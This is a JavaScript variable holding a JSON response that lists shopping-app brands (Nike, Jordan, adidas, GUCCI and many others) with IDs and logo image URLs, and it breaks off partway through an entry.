doCategoryDetail = {"code":200,"msg":"success","data":{"list":[{"brand":{"goodsBrandId":144,"brandName":"Nike","type":0,"logoUrl":"https://du.hupucdn.com/news_byte3724byte_94276b9b2c7361e9fa70da69894d2e91_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":13,"brandName":"Jordan","type":0,"logoUrl":"https://du.hupucdn.com/news_byte3173byte_5c87bdf672c1b1858d994e281ce5f154_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":3,"brandName":"adidas","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24108byte_fc70f4c88211e100fe6c29a6f4a46a96_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":494,"brandName":"adidas originals","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24706byte_9802f5a4f25e6cd1b284a5b754cec4f0_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":439,"brandName":"Supreme","type":0,"logoUrl":"https://du.hupucdn.com/news_byte6426byte_c7ab640bf99963bfc2aff21ca4ff8322_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":79,"brandName":"GUCCI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25670byte_c9ca8b5347750651bebbf84dd7d12d01_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10359,"brandName":"Fear of God","type":0,"logoUrl":"https://du.hupucdn.com/news_byte17196byte_d5f7a627b65e90f6b850b613c14b54a2_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10176,"brandName":"LOUIS VUITTON","type":0,"logoUrl":"https://du.hupucdn.com/news_byte33190byte_d14f21356f020e12a534b967be2bed77_w382h322.png"},"seriesList":[]},{"brand":{"goodsBrandId":1245,"brandName":"OFF-WHITE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte2408byte_4d329f274512ddb136989432292cdd3f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":45,"brandName":"THE NORTH 
FACE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte31268byte_e05935a55a37e7901640f7d09548499d_w151h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10082,"brandName":"FOG","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23329byte_3e247b5d598f7da36a1af24d08cb9ad8_w350h350.png"},"seriesList":[]},{"brand":{"goodsBrandId":10215,"brandName":"STONE ISLAND","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24302byte_570d51bb8c62233c3b52a9ffb05e5d74_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10223,"brandName":"HERMES","type":0,"logoUrl":"https://du.hupucdn.com/news_byte30429byte_658ec36fbe99d2b3ae1e5a685ee1b20c_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10370,"brandName":"Jimmy Choo","type":0,"logoUrl":"https://du.hupucdn.com/news_byte18060byte_e664bd98b2a590c464e0e154b5f9ce53_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1310,"brandName":"Champion","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21403byte_6995f22e76a1a203f4f4dfd3ff43c21b_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":176,"brandName":"Converse","type":0,"logoUrl":"https://du.hupucdn.com/news_byte8272byte_078b04a261c1bb1c868f1522c7ddcefc_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":2,"brandName":"Puma","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26564byte_a768870ae48f1a216dd756c2206c34b1_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":4,"brandName":"New Balance","type":0,"logoUrl":"https://du.hupucdn.com/news_byte6189byte_1cb7717a44b335651ad4656610142591_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":7,"brandName":"Under 
Armour","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21646byte_0bd049d8c27c8509f3166d68a388dfe9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":9,"brandName":"Vans","type":0,"logoUrl":"https://du.hupucdn.com/news_byte9507byte_49aaeb534cecab574949cf34b43da3a5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":33,"brandName":"李宁","type":0,"logoUrl":"https://du.hupucdn.com/news_byte7350byte_d60fa387aac42cb8c9b79700d720397d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":4981,"brandName":"JRs","type":0,"logoUrl":"https://du.hupucdn.com/news_byte5113byte_7a651984f882e48df46c67758d6934d2_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10027,"brandName":"Dickies","type":0,"logoUrl":"https://du.hupucdn.com/news_byte37984byte_e8d6f32f6b17f736a422fac90c99d7e5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10113,"brandName":"ANTI SOCIAL SOCIAL CLUB","type":0,"logoUrl":"https://du.hupucdn.com/news_byte28476byte_863a194b02da977009144bd9f10dde1f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":843,"brandName":"CASIO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte4156byte_4d3d1a6e2beca7f700e1ac92ea6b2fdf_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10141,"brandName":"UNDEFEATED","type":0,"logoUrl":"https://du.hupucdn.com/news_byte16826byte_6d7166e0081d6b42619e54ca06900406_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10250,"brandName":"NINTENDO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte29039byte_b5b91acfeaf88ec0c76df08b08e6e5cd_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10001,"brandName":"Thrasher","type":0,"logoUrl":"https://du.hupucdn.com/news_byte30750byte_446d35e36b912ad366d8f72a6a9cc5e4_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10021,"brandName":"Cav 
Empt","type":0,"logoUrl":"https://du.hupucdn.com/news_byte61774byte_7a5969f3694fc71f727c63e8bc3d95d5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10032,"brandName":"Burberry","type":0,"logoUrl":"https://du.hupucdn.com/news_byte27771byte_9031f22329273c84170de8aa0f7d7c67_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10037,"brandName":"C2H4","type":0,"logoUrl":"https://du.hupucdn.com/news_byte42973byte_8681e3b6092a4dbf6938621cb28e75f4_w284h284.png"},"seriesList":[]},{"brand":{"goodsBrandId":10043,"brandName":"Mitchell & Ness","type":0,"logoUrl":"https://du.hupucdn.com/news_byte35794byte_37e1d65f0c9df1c61c217bded6435b9d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10046,"brandName":"Moncler","type":0,"logoUrl":"https://du.hupucdn.com/news_byte27878byte_9066687c9718c1168f8846653018a935_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1860,"brandName":"THOM BROWNE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte7866byte_fc0d1f01af88a3425bb106fe21f720a9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10062,"brandName":"VLONE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte38175byte_da7a862bd765220eb9bb00efbf5cfab3_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10072,"brandName":"HUAWEI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte53433byte_8949768c520c73adfd0798c7416ff642_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10073,"brandName":"Canada Goose","type":0,"logoUrl":"https://du.hupucdn.com/news_byte40959byte_26901c3ba55661a1ea668d49c599e86b_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1131,"brandName":"隐蔽者","type":0,"logoUrl":"https://du.hupucdn.com/news_byte28746byte_5a165d2728e81983d7bbd59739e56b97_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10095,"brandName":"FMACM","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21768byte_8480a963cd231f2ea4ec032753238cd9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10098,"brandName":"Onitsuka 
Tiger","type":0,"logoUrl":"https://du.hupucdn.com/news_byte27415byte_63662423bde0d02cb8576ff47afb270d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10103,"brandName":"Guuka","type":0,"logoUrl":"https://du.hupucdn.com/news_byte29973byte_ef6eeef0535a0c9b2ade4fb6efc0aa06_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":634,"brandName":"A BATHING APE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte8375byte_cedf2c6ad46d2ac60f0c2f86cbccffcd_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10115,"brandName":"Mishkanyc","type":0,"logoUrl":"https://du.hupucdn.com/news_byte34270byte_f4816f6a78ea1e528144fadcaf671db6_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10119,"brandName":"AMBUSH","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22861byte_44dadd412d9c0b3c57f0d382f5554f5c_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10120,"brandName":"CDG Play","type":0,"logoUrl":"https://du.hupucdn.com/news_byte30859byte_4b1af0b2a9bc9007a3f0c5385fea1f8d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10164,"brandName":"GOTNOFEARS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22932byte_c11b6cb93dc1f26ee98d44db6017c522_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10172,"brandName":"THE NORTH FACE PURPLE 
LABEL","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22025byte_ce1dc9be1690240e01f1365eedac1362_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10186,"brandName":"Subcrew","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23252byte_48b6f7f61cad6c18fb7adafe9696ef1f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10243,"brandName":"Aftermaths","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20974byte_9b01f95cba8e542a258ccc7f1ccf9647_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10248,"brandName":"Aape","type":0,"logoUrl":"https://du.hupucdn.com/news_byte34614byte_beb0b973078c0e17171edea6cd0c715d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10263,"brandName":"apm monaco","type":0,"logoUrl":"https://du.hupucdn.com/news_byte28592byte_384295707fe8076c1cc738402f3b928b_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":6,"brandName":"Reebok","type":0,"logoUrl":"https://du.hupucdn.com/news_byte8192byte_cda902674ee7d4d4c51d32b834a76e7b_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10264,"brandName":"DUEPLAY","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20052byte_41e361c6d2df6895d3b38dfdd9c2efa9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":577,"brandName":"PALACE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte8691byte_5577b630f2fd4fcb8d6f7f45071acc40_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10000,"brandName":"ROARINGWILD","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21733byte_bf73cc451933ed2392d31620c08f76d6_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1222,"brandName":"NOAH","type":0,"logoUrl":"https://du.hupucdn.com/news_byte33752byte_11638ecd79b8d3c7fd29b92dfb9f5f5b_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10030,"brandName":"Carhartt 
WIP","type":0,"logoUrl":"https://du.hupucdn.com/news_byte9975byte_222768bbe7d7daffed18c85090de6153_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10298,"brandName":"BANU","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24263byte_c480365559a6a9808a69547bc8084579_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10357,"brandName":"EQUALIZER","type":0,"logoUrl":"https://du.hupucdn.com/news_byte18391byte_b300fb77b24a776296bc7a92873d1839_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10075,"brandName":"RIPNDIP","type":0,"logoUrl":"https://du.hupucdn.com/news_byte35669byte_5e1b7e4e57ee4568bfb9bf657c8146c5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10087,"brandName":"Stussy","type":0,"logoUrl":"https://du.hupucdn.com/news_byte30589byte_c37b4863d6248dd92a588696c9e1dfe5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10092,"brandName":"NPC","type":0,"logoUrl":"https://du.hupucdn.com/news_byte5399byte_249e0a587b457f46e7e6bad9fd7234bc_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10118,"brandName":"Red 
Charcoal","type":0,"logoUrl":"https://du.hupucdn.com/news_byte19757byte_91817a270103c441138260ad9812f1d8_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10106,"brandName":"Dior","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21672byte_cfe86702e27c9870189b6ad6a7f795b8_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":65,"brandName":"Apple","type":0,"logoUrl":"https://du.hupucdn.com/news_byte1253byte_c8fcc08b731e30d4d1453c77bb4417d7_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10039,"brandName":"Randomevent","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22681byte_d422ea97ad63fe2718dc0a3208602adb_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10260,"brandName":"Swarovski","type":0,"logoUrl":"https://du.hupucdn.com/news_byte29555byte_630db5e96d66e6f5287c293cd78caf27_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10010,"brandName":"PRADA","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21018byte_f70b725f896e7d48d7cf5de27efb693a_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10107,"brandName":"UNIQLO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22384byte_3363df740785c4f46ff7e9e60732d44c_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10173,"brandName":"HIPANDA","type":0,"logoUrl":"https://du.hupucdn.com/news_byte30445byte_c66a18c65a8fed91a6790c51b4742f5a_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10219,"brandName":"HUMAN MADE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte37800byte_decdf76555f22cb831ac23e08ab2018b_w150h150.jpg"},"seriesList":[]},{"brand":{"goodsBrandId":10348,"brandName":"PINKO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21540byte_a15095f6f394d948ae5ab220d8d1a122_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10349,"brandName":"ISSEY MIYAKE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21345byte_f151d2b6a79e5f9189d3edeb5febd68d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10094,"brandName":"HERON 
PRESTON","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21445byte_263c6af2c24fe8eb020f2fad8956aae6_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10217,"brandName":"HARSH AND CRUEL","type":0,"logoUrl":"https://du.hupucdn.com/news_byte27648byte_68693ca8aa0d93a7bc4efacf7131a1d0_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10229,"brandName":"COACH","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22573byte_2d963bacc8403d3bff0f44edd04dab64_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10230,"brandName":"MICHAEL KORS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21530byte_ae96688098a3d529824fa5cb71bf3765_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10273,"brandName":"XLARGE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte38276byte_061c84c498eadd44eb11704a5420f785_w688h628.jpg"},"seriesList":[]},{"brand":{"goodsBrandId":10012,"brandName":"Balenciaga","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25051byte_c9098ab23afe7e5b2ebbe5bbe02cf20b_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10097,"brandName":"New Era","type":0,"logoUrl":"https://du.hupucdn.com/news_byte12037byte_2650d81fe891a08f41ba8ef58f92e4c8_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10236,"brandName":"UNDER GARDEN","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21683byte_ebeac156f070e9f48e74e13567a908ad_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10216,"brandName":"Suamoment","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26349byte_999d4032e637fbccca3aaf6db95ef2ea_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":8,"brandName":"Asics","type":0,"logoUrl":"https://du.hupucdn.com/news_byte3352byte_31e3a9553fef833c3004a84c4c016093_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10261,"brandName":"TIFFANY & 
CO.","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21293byte_6af55972221b24da968a1b9957080c1e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10045,"brandName":"CHANEL","type":0,"logoUrl":"https://du.hupucdn.com/news_byte32784byte_b947def32e782d20594230896ad2b342_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10302,"brandName":"alexander wang","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20702byte_4635ead9077fefadaf9875638452a339_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10347,"brandName":"MLB","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21412byte_ba8096a44748f1e896828a6d1196f571_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10191,"brandName":"BEASTER","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23781byte_319f230d9345cd5154b908631d2bb868_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10245,"brandName":"izzue","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21393byte_cf5140071b8824d433f4b32a51d49220_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10257,"brandName":"FIVE CM","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22092byte_3cd80b1e49ad6bd28e5e371327424532_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10262,"brandName":"Acne Studios","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26766byte_8e0cc00c1fccd1958d56b008370107cc_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":4984,"brandName":"得物","type":0,"logoUrl":"https://du.hupucdn.com/news_byte1528byte_5fd1d0d6bd3ff23d2b6c0d2933da1b8e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10235,"brandName":":CHOCOOLATE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21808byte_2418d1805f60850c961c31ea40982ed2_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10096,"brandName":"PALM 
ANGELS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22102byte_3d85af8f2d0566d7a1620404f9432be5_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1302,"brandName":"WTAPS","type":0,"logoUrl":"https://du.hupucdn.com/news_byte5814byte_ce947464a6105c6aef7d7fb981aaa61e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":4983,"brandName":"NEIGHBORHOOD","type":0,"logoUrl":"https://du.hupucdn.com/news_byte3804byte_316eb37426516d3cf8252fcbab6aa0cf_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10024,"brandName":"BANDAI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte41491byte_d575b1bce5ab5754ea2444c0bb415782_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":2389,"brandName":"LEGO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte33157byte_7e92ea9e2640626b9d52ce2a9fd2a75c_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10224,"brandName":"DANGEROUSPEOPLE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte27331byte_fd65dfa6630e179a1bed93573a9b32cb_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10241,"brandName":"Acupuncture","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26897byte_26ec3a3b2f532353a635cff0752eb743_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10255,"brandName":"MITARBEITER(IN)","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21741byte_058a1342e063fbb9fd341a1f3aca48a6_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":1318,"brandName":"FILA","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24479byte_79cb074cf3d73a420d75a435aee91fe2_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10315,"brandName":"SANKUANZ","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23445byte_3e251bad0695be109b037d80b9908e2a_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10221,"brandName":"*EVAE+MOB","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22561byte_e52e3571b938f7027d4ea5ce1c406cb8_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10226,"brandName":"BABAMA",
"type":0,"logoUrl":"https://du.hupucdn.com/news_byte23766byte_8a0dcd76a4e7032a66209f40d0b6ec85_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10228,"brandName":"OMTO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23242byte_06cc9e12bd4efdf4d1885c401c224e10_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10237,"brandName":"OMT","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24518byte_6be637e798e477e8c2e9e7d502e59b25_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10244,"brandName":"VERAF CA","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22401byte_7c150e55199eb32e12bb29f01ed6c801_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":34,"brandName":"安踏","type":0,"logoUrl":"https://du.hupucdn.com/news_byte925102byte_5d9ca8cebc2286d70ef66f4f4a8f2983_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10210,"brandName":"CDG","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20964byte_54ad49c012c262b02805451b9462f481_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10369,"brandName":"× × DESIGN","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21649byte_f3502bde5ec295493f6b1ffff54fdad9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10017,"brandName":"PLACES+FACES","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22034byte_87c416321487ad3071b2e886690b6c83_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10020,"brandName":"VERSACE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte17169byte_7a363914e3e65ddcab341f2088451861_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10022,"brandName":"LONGINES","type":0,"logoUrl":"https://du.hupucdn.com/news_byte3779byte_b43ce49900670dcd8855801cd4ecbc3e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10029,"brandName":"McQ","type":0,"logoUrl":"https://du.hupucdn.com/news_byte20529byte_0a3c77e055b5ea67e5dd976e0ae15ef9_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10031,"brandName":"Alpha 
Industries","type":0,"logoUrl":"https://du.hupucdn.com/news_byte10726byte_a964cf670ceeb6e83dd7dc74670d2d0e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10033,"brandName":"Hasbro","type":0,"logoUrl":"https://du.hupucdn.com/news_byte33084byte_6ee0b3af2fe9007bd43d7e43b2d9cbcd_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10048,"brandName":"Boy London","type":0,"logoUrl":"https://du.hupucdn.com/news_byte12032byte_dc8badd06954530bab52bee2dcd2281e_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10053,"brandName":"MOSCHINO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte3922byte_e6fed7cc9d76aaed983119b1f6ea4da2_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10099,"brandName":"VEJA","type":0,"logoUrl":"https://du.hupucdn.com/news_byte27380byte_01358f743e3668ee4f860cc03c6cee71_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10105,"brandName":"GAON","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24582byte_5dc995e735d926f10686a3b2e4f99ffe_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10110,"brandName":"EDCO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25568byte_4c07bb13aeb5e88d127f5f30b0582ed2_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10111,"brandName":"FYP","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24609byte_694a64457745672bd4e7b657b6753993_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10125,"brandName":"OPPO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25629byte_7fb979a04f572beaa96b0583f4204748_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10130,"brandName":"Corade","type":0,"logoUrl":"https://du.hupucdn.com/news_byte5181byte_7a202830db26f4d93c565e2cc1e0af4d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10132,"brandName":"MostwantedLab","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21748byte_4c88547590072659de8e0731fef96a4f_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10135,"brandName":"PRBLMS","type":0,"logoUrl":
"https://du.hupucdn.com/news_byte22576byte_910768509dbfed23275fa7989753dffd_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10138,"brandName":"zippo","type":0,"logoUrl":"https://du.hupucdn.com/news_byte28711byte_8d40191080a1a21111d66ce2ee000e90_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10142,"brandName":"UNVESNO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte2826byte_fdb1b1046cae382cfb60cac11f9b281d_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10150,"brandName":"vivo","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26242byte_b829524880093cc2099d470299889c89_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10246,"brandName":"HOKA ONE ONE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte26308byte_1e82701c70c29b871b630adb45dbebd3_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10247,"brandName":"KEEN","type":0,"logoUrl":"https://du.hupucdn.com/news_byte30591byte_670bf1d37ce8479f3fa09a55d28dcb93_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10002,"brandName":"Y-3","type":0,"logoUrl":"https://du.hupucdn.com/news_byte29394byte_2f32b853acb651e2831f8797fe29fbfa_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10267,"brandName":"LOCCITANE","type":0,"logoUrl":"https://du.hupucdn.com/news_byte25047byte_c8480c6f2b9a32fc3a54524146bd1165_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10013,"brandName":"Neil Barrett","type":0,"logoUrl":"https://du.hupucdn.com/news_byte3026byte_cdeab7bf75187f17fa8c069c9a3a051a_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10269,"brandName":"Charlotte Tilbury 
","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23124byte_0113ad2025780a77a7f5131571ecee54_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10014,"brandName":"KENZO","type":0,"logoUrl":"https://du.hupucdn.com/news_byte7359byte_c71c56a9aea36427f7bb106f18151548_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10270,"brandName":"BVLGARI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22644byte_9dfd426ffa4b796999f49447b6a67f13_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10271,"brandName":"Jo Malone London","type":0,"logoUrl":"https://du.hupucdn.com/news_byte22269byte_51fd61cb797b6c2bbf0c0b84981c0948_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10016,"brandName":"Vetements","type":0,"logoUrl":"https://du.hupucdn.com/news_byte24790byte_b66758a5ea903a5a005798f7d84d1498_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10274,"brandName":"GIORGIO ARMANI","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21786byte_2857737687e9338787e5121b81e2fe27_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10019,"brandName":"Givenchy","type":0,"logoUrl":"https://du.hupucdn.com/news_byte23368byte_51dcde3cd1f5ef90c5734249bcd17af0_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10275,"brandName":"GUERLAIN","type":0,"logoUrl":"https://du.hupucdn.com/news_byte21952byte_b06c9655af8bbd85bbacd7905c856d99_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10276,"brandName":"Fresh","type":0,"logoUrl":"https://du.hupucdn.com/news_byte29422byte_c362cefc52c99839bbf299bef133e165_w150h150.png"},"seriesList":[]},{"brand":{"goodsBrandId":10277,"brandName":"Clé de Peau 
